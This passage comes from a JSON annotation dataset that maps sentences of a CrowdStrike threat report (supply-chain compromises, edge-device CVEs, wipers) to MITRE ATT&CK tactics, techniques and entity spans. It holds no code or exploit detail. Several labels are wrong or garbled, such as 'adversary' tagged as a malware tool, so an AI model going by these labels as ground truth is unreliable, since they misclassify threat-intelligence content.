conduct operations in 2023.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "actors exploited trusted relationships", "entities": [ { "text": "actors ", "start": 32, "end": 39, "label": "ThreatActor" }, { "text": "exploited trusted relationships", "start": 95, "end": 126, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s155-65e9d2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 155, "context_before": "Unattributed targeted intrusion actors using TTPs consistent with China-nexus adversaries also exploited trusted relationships to conduct operations in 2023.", "sentence_text": "Throughout the second half of the year, an unattributed actor compromised an India-based information security software vendor and used the resulting access to distribute trojanized executables via legitimate software update processes.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "actor compromised security software vendor and distributed trojanized (.exe) via updates", "entities": [ { "text": "actor ", "start": 56, "end": 62, "label": "ThreatActor" }, { "text": "compromised ", "start": 62, "end": 74, "label": "Action" }, { "text": "security software vendor", "start": 101, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "distribute trojanized executables", "start": 159, "end": 192, "label": "Action" }, { "text": "software update processes.", "start": 208, "end": 234, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s156-ffcd43", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 156, "context_before": "Throughout the second half of the year, an unattributed actor compromised an India-based information security software vendor and used the resulting access to distribute trojanized executables via legitimate software update processes.", "sentence_text": "Though this trusted-relationship exploitation activity remains unattributed, the final payload used in this attack shares significant code overlaps with BackShell and StealthPipes, two tools uniquely attributed to WET PANDA.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.002", "name": "Compromise Software Supply Chain" } ], "procedure": "Uses a payload with code overlapping BackShell and StealthPipes, indicating reuse of WET PANDA tooling in a trusted-relationship/supply-chain compromise.", "entities": [ { "text": "WET PANDA", "start": 214, "end": 223, "label": "ThreatActor" }, { "text": "BackShell ", "start": 153, "end": 163, "label": "Action" }, { "text": "StealthPipes", "start": 167, "end": 179, "label": "Action" }, { "text": " shares significant code overlaps with BackShell and StealthPipes, two tools", "start": 114, "end": 190, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s157-164c8a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 157, "context_before": "Though this trusted-relationship exploitation activity remains unattributed, the final payload used in this attack shares significant code overlaps with BackShell and StealthPipes, two tools uniquely attributed to WET PANDA.", "sentence_text": "A second unattributed actor was observed in late 2023 distributing ShadowPad to suspected Chinese-speaking targets as part of a likely supply chain compromise.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "actor distributes ShadowPad to Chinese-speaking targets", "entities": [ { "text": "actor", "start": 22, "end": 27, "label": "ThreatActor" }, { "text": " distributing ShadowPad", "start": 53, "end": 76, "label": "Action" }, { "text": "Chinese-speaking targets", "start": 90, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "supply chain compromise", "start": 135, "end": 158, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s158-f76902", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 158, "context_before": "A second unattributed actor was observed in late 2023 distributing ShadowPad to suspected Chinese-speaking targets as part of a likely supply chain compromise.", "sentence_text": "The actor compromised a China-based virtual conference platform and leveraged the resulting access to deploy a trojanized ShadowPad installer masquerading as a legitimate software tool.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" }, { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "actor compromised conference platform and leveraged the resulting access to deploy an installer masquerading as a legitimate tool", "entities": [ { "text": "actor ", "start": 4, "end": 10, "label": "ThreatActor" }, { "text": "compromised ", "start": 10, "end": 22, "label": "Action" }, { "text": "China-based virtual conference platform", "start": 24, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "leveraged ", "start": 68, "end": 78, "label": "Action" }, { "text": "deploy ", "start": 102, "end": 109, "label": "Action" }, { "text": "masquerading ", "start": 142, "end": 155, "label": "Action" }, { "text": "ShadowPad installer", "start": 122, "end": 141, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s159-29249b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 159, "context_before": "The actor compromised a China-based virtual conference platform and leveraged the resulting access to deploy a trojanized ShadowPad installer masquerading as a legitimate software tool.", "sentence_text": "In early 2023, an unattributed actor likely compromised an update server associated with iPhone i4Tools management software to deploy AvanteGarde, a malware framework associated with China-nexus activity cluster InnateSpark.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "actor compromised an update server to deploy AvanteGarde", "entities": [ { "text": "actor ", "start": 31, "end": 37, "label": "ThreatActor" }, { "text": "compromised ", "start": 44, "end": 56, "label": "Action" }, { "text": "update server", "start": 59, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "deploy AvanteGarde", "start": 127, "end": 145, "label": "Action" }, { "text": "AvanteGarde", "start": 134, "end": 145, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s160-e72c40", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 160, "context_before": "In early 2023, an unattributed actor likely compromised an update server associated with iPhone i4Tools management software to deploy AvanteGarde, a malware framework associated with China-nexus activity cluster InnateSpark.", "sentence_text": "Though CrowdStrike CAO was able to confirm at least 250 customers had connected to the compromised update server, only 10% received the malicious update, possibly indicating the actor down-selected high-value targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s161-98b11f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 161, "context_before": "Though CrowdStrike CAO was able to confirm at least 250 customers had connected to the compromised update server, only 10% received the malicious update, possibly indicating the actor down-selected high-value targets.", "sentence_text": "Threat Highlight: North Korea’s Supply Chain Compromises Democratic People’s Republic of Korea (DPRK) adversaries also demonstrated an increased interest in exploiting trusted relationships in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s162-79a92b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 162, "context_before": "Threat Highlight:\nNorth Korea’s Supply Chain Compromises Democratic People’s Republic of Korea (DPRK) adversaries also demonstrated an increased interest in exploiting trusted relationships in 2023.", "sentence_text": "This exploitation tradecraft was first observed in March 2023, when an adversary compromised software at VoIP provider 3CX.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "adversary compromised software at VoIP provider 3CX", "entities": [ { "text": "adversary ", "start": 71, "end": 81, "label": "MalwareTool" }, { "text": "compromised ", "start": 81, "end": 93, "label": "Action" }, { "text": "software at VoIP provider 3CX", "start": 93, "end": 122, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s163-f753a2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 163, "context_before": "This exploitation tradecraft was first observed in March 2023, when an adversary compromised software at VoIP provider 3CX.", "sentence_text": "This compromise appears to have started with an upstream supply chain compromise of financial technology firm Trading Technologies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Supply chain compromise", "entities": [ { "text": "supply chain compromise", "start": 57, "end": 80, "label": "Action" }, { "text": "financial technology firm Trading Technologies.", "start": 84, "end": 131, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s164-3b9a41", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 164, "context_before": "This compromise appears to have started with an upstream supply chain compromise of financial technology firm Trading Technologies.", "sentence_text": "The adversary used trojanized 3CX", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "adversary used trojanized 3CX", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "used ", "start": 14, "end": 19, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s165-4e89de", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 165, "context_before": "The adversary used trojanized 3CX", "sentence_text": "Electron Windows and macOS desktop application variants to deliver information stealers to victim environments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "deliver information stealers to victim environments using trojanized applications", "entities": [ { "text": "deliver information stealers to victim environments", "start": 59, "end": 110, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p22-s166-dcddd3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 22, "sentence_id": 166, "context_before": "Electron Windows and macOS desktop application variants to deliver information stealers to victim environments.", "sentence_text": "The threat actors then persisted with a July 2023 campaign that similarly abused access to a technology company in efforts to compromise its product and use legitimate infrastructure to infiltrate the compromised company’s clientele.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.001", "name": "Compromise Software Dependencies and Development Tools" } ], "procedure": "actors abused access to a tech company to compromise products and use legit infrastructure to infiltrate compromised clientele", "entities": [ { "text": "threat actors", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "abused access", "start": 74, "end": 87, "label": "Action" }, { "text": "technology company", "start": 93, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "compromise its product", "start": 126, "end": 148, "label": "Action" }, { "text": "use legitimate infrastructure to infiltrate the compromised company’s clientele.", "start": 153, "end": 233, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s167-d96e59", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 167, "context_before": "The threat actors then persisted with a July 2023 campaign that similarly abused access to a technology company in efforts to compromise its product and use legitimate infrastructure to infiltrate the compromised company’s clientele.", "sentence_text": "via a trojanized CyberLink media player variant.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.003", "name": "Spearphishing via Service" } ], "procedure": "Usage of Trojanized CyberLink media player varient", "entities": [ { "text": "trojanized CyberLink media player variant", "start": 6, "end": 47, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s168-0b1d7d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 168, "context_before": "via a trojanized CyberLink media player variant.", "sentence_text": "The motivation driving these compromises remains undefined.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s169-2aaf1b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 169, "context_before": "The motivation driving these compromises remains undefined.", "sentence_text": "The adversary may be using supply chain compromises to cast a wide net and deliver appropriate follow-on tooling to interesting targets.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Cast a wide net and deliver follow-on tooling on targets", "entities": [ { "text": "deliver appropriate follow-on tooling", "start": 75, "end": 112, "label": "MalwareTool" }, { "text": "cast a wide net", "start": 55, "end": 70, "label": "Action" }, { "text": "deliver appropriate follow-on tooling", "start": 75, "end": 112, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s170-ad7c42", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 170, "context_before": "The adversary may be using supply chain compromises to cast a wide net and deliver appropriate follow-on tooling to interesting targets.", "sentence_text": "LABYRINTH CHOLLIMA is equally likely abusing trusted relationships between suppliers and product users to infiltrate specific high-value targets for currency generation and espionage campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "LABYRINTH CHOLLIMA abuses trusted relationships to infiltrate targets", "entities": [ { "text": "LABYRINTH CHOLLIMA ", "start": 0, "end": 19, "label": "ThreatActor" }, { "text": "infiltrate specific high-value targets", "start": 106, "end": 144, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s171-9c2fa8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 171, "context_before": "LABYRINTH CHOLLIMA is equally likely abusing trusted relationships between suppliers and product users to infiltrate specific high-value targets for currency generation and espionage campaigns.", "sentence_text": "The adversary likely considers supply chain compromise a useful tactic with potential to streamline operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s172-6f7c6a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 172, "context_before": "The adversary likely considers supply chain compromise a useful tactic with potential to streamline operations.", "sentence_text": "This assessment is made with moderate confidence based on the volume of supply chain compromises observed in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s173-ccdcda", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 173, "context_before": "This assessment is made with moderate confidence based on the volume of supply chain compromises observed in 2023.", "sentence_text": "Outlook:\nThird-Party Relationship Exploitation Trusted-relationship compromises will continue to attract targeted intrusion actors in the immediate future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s174-cbc478", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 174, "context_before": "Outlook:\nThird-Party Relationship Exploitation Trusted-relationship compromises will continue to attract targeted intrusion actors in the immediate future.", "sentence_text": "Organizations operating in the technology sector are uniquely at risk from third-party relationship exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p23-s175-11bc0c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 23, "sentence_id": 175, "context_before": "Organizations operating in the technology sector are uniquely at risk from third-party relationship exploitation.", "sentence_text": "In 2023, nearly every trusted-relationship compromise originated as part of an intrusion at a technology sector organization that provided commercial software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "Trusted relationship compromises were usually part of intrusions in 2023", "entities": [ { "text": "trusted-relationship compromise", "start": 22, "end": 53, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p24-s176-d088cf", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 24, "sentence_id": 176, "context_before": "In 2023, nearly every trusted-relationship compromise originated as part of an intrusion at a technology sector organization that provided commercial software.", "sentence_text": "VULNERABILITY LANDSCAPE:\n“UNDER THE RADAR” EXPLOITATION Threat actors have adapted to the enhanced visibility of traditional endpoint detection and response (EDR) sensors by altering their exploitation tactics for initial access and lateral movement.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": null, "procedure": "Threat actors alter exploitation tactics to support initial access and lateral movement.", "entities": [ { "text": "Threat actors", "start": 56, "end": 69, "label": "ThreatActor" }, { "text": "altering their exploitation tactics", "start": 174, "end": 209, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p24-s177-d1292a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 24, "sentence_id": 177, "context_before": "VULNERABILITY LANDSCAPE:\n“UNDER THE RADAR” EXPLOITATION Threat actors have adapted to the enhanced visibility of traditional endpoint detection and response (EDR) sensors by altering their exploitation tactics for initial access and lateral movement.", "sentence_text": "They are now targeting the network periphery, where defender visibility is reduced by the possibility that endpoints may lack EDR sensors or cannot support sensor deployment (Figure 3).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Threat actors target network periphery systems with reduced visibility.", "entities": [ { "text": "targeting the network periphery", "start": 13, "end": 44, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p24-s178-d31daf", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 24, "sentence_id": 178, "context_before": "They are now targeting the network periphery, where defender visibility is reduced by the possibility that endpoints may lack EDR sensors or cannot support sensor deployment (Figure 3).", "sentence_text": "MANAGED\nLAPTOPS\nNAS/BACKUP TELEPHONY MANAGED STORAGE DEVICES WORKSTATIONS INTERNET FIREWALL/VPN ROUTER MANAGED GATEWAY SERVERS DOMAIN SERVER WORKSTATION LAPTOP CONTROLLER KEY:\nSENSOR-MANAGED ASSET END-OF-LIFE (EOL) PRODUCTS TARGET/UNMANAGED ASSET", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s179-27e795", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 179, "context_before": "MANAGED\nLAPTOPS\nNAS/BACKUP TELEPHONY MANAGED STORAGE DEVICES WORKSTATIONS INTERNET FIREWALL/VPN ROUTER MANAGED GATEWAY SERVERS DOMAIN SERVER WORKSTATION LAPTOP CONTROLLER KEY:\nSENSOR-MANAGED ASSET END-OF-LIFE (EOL) PRODUCTS TARGET/UNMANAGED ASSET", "sentence_text": "Unmanaged network appliances — particularly edge gateway devices —remained the most routinely observed initial access vector for exploitation during » UNMANAGED NETWORK APPLIANCES — 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s180-2ac8fc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 180, "context_before": "Unmanaged network appliances — particularly edge gateway devices —remained the most routinely observed initial access vector for exploitation during » UNMANAGED NETWORK APPLIANCES — 2023.", "sentence_text": "These devices are commonly based on obsolete architecture, leading to PARTICULARLY EDGE GATEWAY broadly exploited vulnerabilities in firewall and VPN platforms from Cisco (CVE- DEVICES — REMAINED THE MOST 2023-20198), Citrix (CVE-2023-3519, CVE-2023-4966) and F5 (CVE-2023-46747).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "The devices systems are old, so they have less protection and more vulnerabilities", "entities": [ { "text": "Cisco (CVE- DEVICES — REMAINED THE MOST 2023-20198)", "start": 165, "end": 216, "label": "Infrastructure_Indicator" }, { "text": "Citrix (CVE-2023-3519, CVE-2023-4966)", "start": 218, "end": 255, "label": "Infrastructure_Indicator" }, { "text": "F5 (CVE-2023-46747)", "start": 260, "end": 279, "label": "Infrastructure_Indicator" }, { "text": "exploited vulnerabilities in firewall and VPN platforms", "start": 104, "end": 159, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s181-e66f9a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 181, "context_before": "These devices are commonly based on obsolete architecture, leading to PARTICULARLY EDGE GATEWAY broadly exploited vulnerabilities in firewall and VPN platforms from Cisco (CVE- DEVICES — REMAINED THE MOST 2023-20198), Citrix (CVE-2023-3519, CVE-2023-4966) and F5 (CVE-2023-46747).", "sentence_text": "ROUTINELY OBSERVED INITIAL ACCESS VECTOR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s182-3e4433", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 182, "context_before": "ROUTINELY OBSERVED INITIAL ACCESS VECTOR", "sentence_text": "FOR EXPLOITATION Exploitation was also observed in various other unmanaged devices throughout DURING 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s183-a96278", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 183, "context_before": "FOR EXPLOITATION Exploitation was also observed in various other unmanaged devices throughout DURING 2023.", "sentence_text": "Targeted intrusion actors likely engaged in opportunistic Ivanti mobile device management application targeting via CVE-2023-35078 and CVE-2023-35082.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Targeted intrusion actors likely related to targeting Ivanti mobile device management app via CVEs", "entities": [ { "text": "Ivanti mobile device management application", "start": 58, "end": 101, "label": "Infrastructure_Indicator" }, { "text": " CVE-2023-35078", "start": 115, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "CVE-2023-35082", "start": 135, "end": 149, "label": "Infrastructure_Indicator" }, { "text": " Ivanti mobile device management application targeting", "start": 57, "end": 111, "label": "Action" }, { "text": "Targeted intrusion actors", "start": 0, "end": 25, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s184-b52f89", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 184, "context_before": "Targeted intrusion actors likely engaged in opportunistic Ivanti mobile device management application targeting via CVE-2023-35078 and CVE-2023-35082.", "sentence_text": "Akira ransomware operators leveraged exploits for CVE-2023-27532 — a vulnerability in Veeam Backup & Replication — to pivot into victim backup storage infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Akira ransomware operators leveraged exploits for CVE-2023-27532 to pivot into victim backup storage infrastructure.", "entities": [ { "text": "Akira ransomware operators", "label": "ThreatActor", "start": 0, "end": 26 }, { "text": "CVE-2023-27532", "label": "Infrastructure_Indicator", "start": 50, "end": 64 }, { "text": "Veeam Backup & Replication", "label": "Infrastructure_Indicator", "start": 86, "end": 112 }, { "text": "leveraged exploits for CVE-2023-27532 — a vulnerability in Veeam Backup & Replication — to pivot into victim backup storage infrastructure", "label": "Action", "start": 27, "end": 165 } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s185-382520", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 185, "context_before": "Akira ransomware operators leveraged exploits for CVE-2023-27532 — a vulnerability in Veeam Backup & Replication — to pivot into victim backup storage infrastructure.", "sentence_text": "Additionally, eCrime actors developed zero-day exploits for telephony products based on an abandoned open-source project.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.004", "name": "Exploits" } ], "procedure": "Actors developed exploits for products based on an open-source project", "entities": [ { "text": "eCrime actors", "start": 14, "end": 27, "label": "ThreatActor" }, { "text": "developed zero-day exploits for telephony products", "start": 28, "end": 78, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s186-ef240c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 186, "context_before": "Additionally, eCrime actors developed zero-day exploits for telephony products based on an abandoned open-source project.", "sentence_text": "The latter zero-day exploit relates to another trend observed in 2023: a focus on EOL product exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.005", "name": "Exploits" } ], "procedure": "The latest zero-say exploit relates to a new focus on expired product exploitation", "entities": [ { "text": "a focus on EOL product exploitation", "start": 71, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s187-2bd68e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 187, "context_before": "The latter zero-day exploit relates to another trend observed in 2023: a focus on EOL product exploitation.", "sentence_text": "Threat actors are actively developing exploits for » EOL products that cannot be patched and often do not allow for modern sensor THREAT ACTORS ARE ACTIVELY deployment.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.004", "name": "Exploits" } ], "procedure": "Developing exploits for old, expired products with no threat sensors", "entities": [ { "text": "developing exploits for » EOL products that cannot be patched", "start": 27, "end": 88, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s188-279d61", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 188, "context_before": "Threat actors are actively developing exploits for » EOL products that cannot be patched and often do not allow for modern sensor THREAT ACTORS ARE ACTIVELY deployment.", "sentence_text": "Unsupported operating system (OS) servers and legacy gateway DEVELOPING EXPLOITS FOR EOL appliances offer easy access — even to otherwise antiquated malware families — PRODUCTS THAT CANNOT BE PATCHED leading to lingering infections that distract resources from contemporary security AND OFTEN DO NOT ALLOW FOR issues.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s189-9523d4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 189, "context_before": "Unsupported operating system (OS) servers and legacy gateway DEVELOPING EXPLOITS FOR EOL appliances offer easy access — even to otherwise antiquated malware families — PRODUCTS THAT CANNOT BE PATCHED leading to lingering infections that distract resources from contemporary security AND OFTEN DO NOT ALLOW FOR issues.", "sentence_text": "MODERN SENSOR DEPLOYMENT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s190-0e55fb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 190, "context_before": "MODERN SENSOR DEPLOYMENT.", "sentence_text": "Increasing defender visibility to such exploit vectors is key in mitigating the risk posed by these tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s191-8e4e17", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 191, "context_before": "Increasing defender visibility to such exploit vectors is key in mitigating the risk posed by these tactics.", "sentence_text": "Finally, CrowdStrike Falcon® Spotlight can determine whether sensor-deployed assets are subject to known vulnerabilities and when these endpoints have reached EOL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s192-f82af6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 192, "context_before": "Finally, CrowdStrike Falcon® Spotlight can determine whether sensor-deployed assets are subject to known vulnerabilities and when these endpoints have reached EOL.", "sentence_text": "In the ensuing months, CrowdStrike CAO tracked ongoing cyber operations from targeted intrusion and hacktivist actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s193-01fc99", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 193, "context_before": "In the ensuing months, CrowdStrike CAO tracked ongoing cyber operations from targeted intrusion and hacktivist actors.", "sentence_text": "Activity and claims from both groups primarily focus on targeting operational technology or other critical systems — likely to psychologically influence target populations — and deploying destructive wipers against Israeli or Israel-linked entities.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" } ], "procedure": "Attackers focus on targeting operational technology and deploying destructive wipers against Israeli", "entities": [ { "text": "focus on targeting operational technology", "start": 47, "end": 88, "label": "Action" }, { "text": "deploying destructive wipers ", "start": 178, "end": 207, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p25-s194-a2980b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 25, "sentence_id": 194, "context_before": "Activity and claims from both groups primarily focus on targeting operational technology or other critical systems — likely to psychologically influence target populations — and deploying destructive wipers against Israeli or Israel-linked entities.", "sentence_text": "Most conflict-driven cyber operations observed include hacktivist activity and operations by suspected faketivists.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s195-81e54e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 195, "context_before": "Most conflict-driven cyber operations observed include hacktivist activity and operations by suspected faketivists.", "sentence_text": "> HAMAS AND ALLIED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p26-s196-ecc429", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 26, "sentence_id": 196, "context_before": "> HAMAS AND ALLIED", "sentence_text": "MILITANT GROUPS ATTACK ISRAEL > ISRAEL IMPLEMENTS FOUR-HOUR CEASEFIRE IN NORTHERN GAZA >", "relevant": 